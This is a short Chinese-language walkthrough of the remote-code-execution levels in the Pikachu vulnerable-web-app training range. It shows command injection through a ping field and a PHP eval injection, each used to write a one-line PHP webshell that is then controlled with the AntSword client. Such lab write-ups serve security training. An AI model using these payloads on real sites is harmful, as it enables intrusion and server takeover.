Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
云雾J视界几秒前
AI服务器供电革命:为何交错并联Buck成为算力时代的必然选择
服务器·人工智能·nvidia·算力·buck·dgx·交错并联
無限神樂2 分钟前
docker compose简介
运维·docker·容器
ELI_He9992 分钟前
gpg使用记录
linux·运维·服务器
zzh_my5 分钟前
centos yum 安装软件报错
linux·运维·centos
杰克崔15 分钟前
内核里的__private变量的使用及sparse
linux·运维·服务器·车载系统
每次学一点15 分钟前
如何将网吧电脑加入ZeroTier虚拟局域网
运维·服务器·网络
勉灬之20 分钟前
基于 Node.js + mysql2 的实用同步助手,适合开发/测试环境下快速对齐表数据
服务器·网络·node.js
很㗊23 分钟前
Linux --- tar命令常见用法
linux·运维·服务器
2501_9413297223 分钟前
气压表智能读数检测:基于YOLOv8的指针与刻度识别实现自动化读数
运维·yolo·自动化
RisunJan26 分钟前
Linux命令-ld(将目标文件连接为可执行程序)
linux·运维·服务器